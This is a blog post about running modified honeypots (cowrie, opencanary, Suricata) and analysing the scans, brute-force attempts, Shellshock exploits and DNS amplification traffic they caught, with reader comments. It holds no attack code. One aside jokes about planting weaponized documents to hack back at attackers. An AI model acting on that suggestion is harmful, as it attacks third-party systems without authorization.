Funny Honey – tracking hackers in cyberspace part1

Like many people in the security community I’ve decided to run a bunch of honeypots and see whats out there on the scary Internet. You’ve probably heard it’s all China, right?
So, I’ve setup a six hosts honeypot that was hosted on Google Cloud for a few months to find out.

Tech stack

To really gain actionable intelligence you need to have a quality honeypot software, preferably that fully emulates a service and properly instrumented.  Unfortunately, I didn’t have a resources to build such a thing myself(hell of a task). Open source honeypots also have a lot of drawbacks:

  • They’re old. Most of them haven’t been updated in years like honeyd or dionea.
  • They’re easy to fingerprint. If you run them as is, it is unlikely you would get any interesting data, since they can be trivially fingerprinted.
  • They’re low interaction. Most of them can’t go beyond passively listen on the port.
  • They’re pain to deploy.

So I’ve opted to run a mix of customized open source and custom developed ones.
Here is my stack:

  • SSH – for SSH I was running cowrie. It is a medium interaction honeypot that emulates live Linux system to some degree. I’ve modified it, so it would emulate an Ubuntu 14.04 server. I’ve also modified all the modules, so anyone trying to figure if he hit a honeypot system would fail until it’s too late.
  • DNS – for DNS I was running a modified DNSChef. Which emulates a fully functional DNS server, but can be customized to give any dummy reply. I was mostly used it to monitor DNS Amplification DDoS attacks.
  • Web – For web I’ve written a low interaction HTTP\HTTPS server, that detect web attacks, download shellshock payloads if any and capable of replying 200 code on any request. I was lazy to have it serve any real web page, so it was mostly aimed to catch various scripts and scanners.
  • Mail – I was also running a fully featured open smtp relay, that was saving any emails send thru it, but it didn’t really send anything anywhere. For that I was using smtp-sink from postfix.
  • Telnet, SNMP, RDP, NTP, MSSQL, MySQL, VNC, FTP, TFTP, SIP – All those was low interaction, running on opencanary, but was capable to emulate banner and basic service routines, so on nmap service scan they would look like a real thing and still can be somewhat useful.
  • IDS – I’ve opted for Suricata with ET Open ruleset.

I was running every service on all the machines, so they look a bit weird with so much ports open and two SSH daemons, but it was a trade off since I also wanted to know if all my honeypots was hit by the same attack or not. However, it is not recommend to run all those services on a single machine, as it looks really suspicious, especially mixed Linux and Windows ones, but it also could be a some kind of NAT firewall with port forwarding, so you never know…
Here is how one of my honeypots looks like on shodan:

honey1

Shodan also didn’t think it was a honeypot via their Honeypot Or Not check:
honey2

Point is – you unlikely will get a real threat intelligence besides automated attacks and amateur script kiddies with this setup, but it still can be a fun project to work on and useful, as you never know who will come knocking.

The story

To have a little bit of fun I’ve also designed a honeypot to look like an FBI system with banners, users, various other artifacts and “classified” files all designed to support a narrative that it was a some kind of classified FBI system with intelligence information. All this was obtained with a little bit of OSINT, creative imagination and some data from pastebin, so don’t come knocking on my door 🙂
Here is some files:

honey3

honey4

And here is motd message that will greet the attacker:

honey5

I was just curious how real attackers, that was poking around server, would react. Pseudo sensitive data or even better, documents with honeytokens can be an effective way to lure and track attackers.
Or you known, just put some weaponized documents there and have fun popping shells on attackers 🙂

Attack stats

Let’s see what insights can we get from all this data.
Of course not every connection is attack per se, but we still count every connection as attack in our stats, this will also include stuff like Shodan and other research scans, but there is no easy way to exclude them all.
First question is how fast a new system was attacked?
There is a common notion that Internet is constantly under attack and new systems will be attacked almost immediately after popping online.
I’ve setup all my honeypots at different times throughout a few weeks. Some of them sat idle for a few days or even a week, but some was attacked as fast as 20 minutes after initial setup.
So, looks like the notion is still true.
Next question is what services was targeted the most?

honey6

Everybody knows that exposing DB servers on the internet is a really bad idea, but why mysql is not that heavily targeted then? And I thought rdp, web and ssh along with telnet would be more targeted. Surprising stats to me.

Next question is what country is responsible for most attacks?

honey7

Here is top 10 attacker countries. Looks like it is China after all.
However, attacks really come all over the world – there is attacks from 147 countries. So it doesn’t give us much insight, other than maybe geo block China and other countries than you do not do any business with, if you want to reduce the noise.

Let’s see what ASNs contributed most to attacks?

honey8

Here is top 10 ASNs reflecting stats by countries.
Once again this doesn’t provide us much insight as there is 1839 ASNs from which attacks originated with most of them being ISPs for consumers.
The only curious thing here is Alibaba network, but I was unable to find additional information about what kind of ASN this is, if they are ISP or not and if they have any relation to Alibaba Group.
Let’s try to dig deeper into this ASN data and try to find something interesting. Digging into ASN data, if you have a decent internet presence or traffic coming your way can be insightful, i.e. you could find your clients as attack sources and notify them or just notice common ISPs, that is tolerant to botnets(ahem, Hetzner and OVH) and other stuff, so you could, maybe filter or scrutinize their traffic more. Note that some of this data could be incorrect due to nature of IP to ASN mapping via public database.

  • AS2152 California State University, Office of the Chancellor
    Just a single HTTP connection attempt from this ASN, nothing interesting.
  • AS197467 Samara State Aerospace University (SGAU)
    Automated attack for telnet service. Looks like they have an infected system.
  • AS6769 State Enterprise Infostruktura
    This one is particularly interesting, here is a snip from their website:
    State Enterprise „Infostruktura” is administrator of the Secure State Data Communication Network (SSDCN), that is isolated from the Internet and provides the secure national-wide communication services for public institutions in Lithuania, also provides communications via SSDCN and TESTA with the National Networks of EU Member States, EU Institutions and EU Agencies. TESTA is the European Community’s own private network, also isolated from the Internet and allows officials from different Ministries and administrations to communicate at a trans-European level in a safe and prompt way.
    What? Isolated network hitting my honeypot?
    Few automated attacks for telnet service from them. Looks like they got infected system as well. So much for secure network. Of course it doesn’t mean isolated network is exposed, but who knows what you can dig from their ASN.
  • AS16880 TREND MICRO INCORPORATED
    Generic HTTP connections. All with user-agent Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0). Doesn’t look like a regular scan as there is a very few connections. Hunting exploit kits maybe?
  • AS27471 Blue Coat Systems, Inc
    Got a few connections to ssh as well a single HTTP connection. Doesn’t look like a regular scan as volume is very low and hitting only few of my honeypots. All SSH connections is with java client SSH-2.0-JSCH-0.1.42.
    As for HTTP request it was for url faire-dess-%C3%A0-l’ucpa.html which means something about makeup in french. Probably something that was hosted on my honeypot IP before.
  • AS7160 Oracle Corporation
    Got SSH bruteforce from them(with oracle:oracle ironically) as well as some RDP bruteforce. Abuse of Oracle cloud it seems or compromised servers.
  • AS32934 Facebook, Inc.
    Just generic HTTP connections with user-agent facebookexternalhit\/1.1 Most likely some links that was hosted on my IP before.
  • AS29484 Ruhr-Universitaet Bochum
    Amplification DDoS Tracker Project
  • AS197068 HLL LLC
    Russian Anti-DDoS vendor Qrator doing research scans.
  • AS73 University of Washington
    Some kind of research project about website accessibility.
  • AS62454 Zyztm Research Division 10 B.V.
    Few connections to FTP and POP3 ports, they also in spamhouse blacklist. They claim to do some kind of research on they site but looks like it wasn’t updated in a while and some pages don’t work there. Shady network, but doesn’t look like they do internet wide scans, I got only few connections from them.
  • AS32666 Case Western Reserve University
    Internet performance research project
  • AS25468 Rzeszow University of Technology
    Got infected machine doing SSH bruteforce and downloading malware.
  • AS2510 FUJITSU LIMITED
    Few machines infected doing SSH and telnet bruteforcing.
  • AS23028 Team Cymru Inc.
    DNS research scans
  • AS20940 Akamai International B.V.
    Anti-DDoS vendor doing research scans
  • AS88 Princeton University
    Just a single HTTP connection, nothing interesting.
  • AS8308 NAUKOWA I AKADEMICKA SIEC KOMPUTEROWA INSTYTUT BADAWCZY
    Single machine doing limited RDP bruteforce.
  • AS8278 Technical University of Crete
    Single HTTP connection, nothing interesting.
  • AS7624 jeonju university
    One infected machine doing automated telnet attacks.
  • AS7560 Chonbuk National University
    One infected machine doing automated telnet attacks.
  • AS56765 shahid beheshti university
    One host in CINS blacklist that was scanning for RDP, nothing else.
  • AS5379 Univerzitet Sv. Kiril i Metodij
    Single connection to SSH with immediate disconnect. Got scared of FBI? 🙂
  • AS47610 RWTH Aachen University
    Some kind of research scan
  • AS38450 Ministry of Infomation Communication Technology
    This is a Thailand ministry, single host doing RDP bruteforcing. Also note a typo in Information word 🙂
  • AS3784 Pohang University of Science and Technology|
    Single host doing RDP bruteforcing
  • AS3449 Universidad Nacional de Buenos Aires
    Single connection to SSH with immediate disconnect. Got scared of FBI? 🙂
  • AS3141 Benemerita Universidad Autonoma de Puebla
    One infected host doing automated telnet attacks
  • AS3058 Joint SuperComputer Center of the Russian Academy of Sciences
    One infected host doing automated telnet attacks
  • AS27 University of Maryland
    Got couple of pings from a single machine, nothing interesting.
  • AS25 University of California at Berkeley
    Got few HTTP requests to ts.php page from a single machine. Wasn’t able to find what is this.
  • AS23974 Ministry of education
    Another Thailand ministry, single machine doing a limited VNC scan.
  • AS203959 BackConnect Security LLC
    One host doing telnet bruteforcing. This is not a security company, I wasn’t able to find what kind of network is this.
  • AS10198 Catholic University of Pusan
    Got couple of DNS Reply packets with domain pgcki.1st.attackd9.m.cdn30.com. That also triggered a rule ET TROJAN DNS Reply for unallocated address space – Potentially Malicious 1.1.1.0\24
    Not sure what is this, since I never send DNS requests in the first place, but main domain is associated with malware in the past.

So we got all bunch of stuff – infected systems, security companies and universities doing research projects and just random noise.
Now let’s dig deeper into each service.

IDS

First question, is what signatures was triggered?

honey9

Here is TOP 10. Overall, there is 287 unique signatures was triggered.
The only anomaly here is the Python rule, it was triggered because Google’s monitoring system was constantly hitting one of my servers for some reason, however I didn’t bought any monitoring services.
Let’s dig deeper into this dataset.

Next question, is there any exploits used?

honey10

Here is all signatures in EXPLOIT category. Sorry Verizon, no FREAK here.
I was curios what is Zollard as I don’t remembered anything with that name. Turns out this is an old worm from 2013 targeting IoT devices also known as Darlloz that exploits old php-cgi flaw and uploads malware.

Another one that caught my attention is IPMI – this is also for high profile vulnerability from 2013 that allows to bypass authentication into IPMI console such as Dell iDRAC or HP iLO.

What about Web vulnerabilities?

honey11

Most of this is Shellshock and most of the payloads, that was still alive to download is Darlloz worm.

Let’s see where exploitation attempts coming from?

honey12

honey13

Here is top 10 ASN. Overall, attacks coming from 71 ASNs. IANA one is incorrect by the way, it is in fact some kind of VPS provider on another ASN. Nothing interesting about this data.
Next question – is there any malware related traffic?

honey14

Morto signature generate lots of FP on regular bruteforce attacks, so it’s not necessary Morto worm from 2011.
Micros one is interesting, this looks for Micros POS terminal RDP server, possibly remnants of BrutPOS botnet

Let’s see where those malware coming from?

honey29

honey28

Here is top 10 stats. Overall we got 83 countries and 379 ASNs. This also heavily scewed by RDP bruteforce attacks, but I’ve included this data anyway.

Next question – what about scanners?

honey15

Nothing particularly interesting here.
Let’s see where we get scanned from?

honey16

Here is top 10. Overall we got scanned from 69 countries.

Now to ASN data.

honey17

Here is top 10. Overall we got scanned from 375 ASNs.
China do contribute the most to scanning in terms of unique hosts doing the scanning.

Next question – What about DOS attacks?

honey18

No surprises here. One detail though, since the nature of amplification attack is forge request from target source ip, we will be looking into victims, rather than attackers below.

Let’s see where victims are located?

honey19

Here is top 10. Overall, we got 27 countries as victims.

And for ASN we got:

honey20

Here is top 10. Overall, we got 123 ASNs under DDOS attack, with most of them being hosting providers.

DNS

Let’s dig into DNS server data.
First question – what domains was requested, except ANY request types?

honey21

Here is top 10. Overall we got 80 unique domain names.
There is very little requests for normal domains that is not associated with various DNS scanning services.
Baidu ones is weird though, however most of those request come from China as well.

Next question – what DNS request types was served?

honey22

No real surprises here, with ANY in a huge lead as it used to carry out DNS Amplification DDoS attacks.

Next question – What countries and ASNs connected to our DNS server?

honey24

Here is top 10. Overall we got connections from 18 countries.

As for ASN:

honey23

Here is top 10. Overall we got connections from 49 ASNs.
Next questions – Who was victims to DDoS?

honey25

Here is top 10. Overall we got 135 victims.
Of course not all of them a real victims, as various scanners also send a same request.
Most of the victims is servers without distinct dns names plus a little bit of client machines hosted on consumer ISPs.
I don’t see any DDoS attacks against well known or just relevant websites through my servers, which is surprising. The most attacked server have an apache test page.
Next question – what countries and ASNs is most attacked?

honey26

Here is top 10. Overall we got 20 countries attacked.
And for ASN:

honey27

All in all, nothing interesting in this data.

In part2 we continue to analyze data from other services.

Advertisements

8 comments

  1. friends have also seen a lot of sipvicious. would be interesting to hear more analysis of it.

    for the ssh brutes, can you determine if certain lists (e.g., rockyou-75) or username sets was used? that analyses would be awesome to hear more about

    Like

  2. if if the lists for ftp, ssh, telnet, et al correlate at all. seen interesting attacks that do ftp or ssh bruting and then leveraging restricted shells (i.e., ftponly) to enable ssh forwarding on the same host and then pivot through to an smtp server in order to send unsolicited email. may be difficult to detect these actors if you don’t send the mail though, at least for a day or two at first

    Like

  3. […] *参考来源:dfir-blog ,FB小编老王隔壁的白帽子翻译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM) […]

    Like

  4. […] *参考来源:dfir-blog ,FB小编老王隔壁的白帽子翻译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM) […]

    Like

  5. […] *参考来源:dfir-blog ,FB小编老王隔壁的白帽子翻译 […]

    Like

  6. TrendMicro frequently scan for HTTP(s) ports. They are often the first ones to knock the 80 port if you set up a webserver.

    Also scans coming from the University of Michigan may be related to the Censys project

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: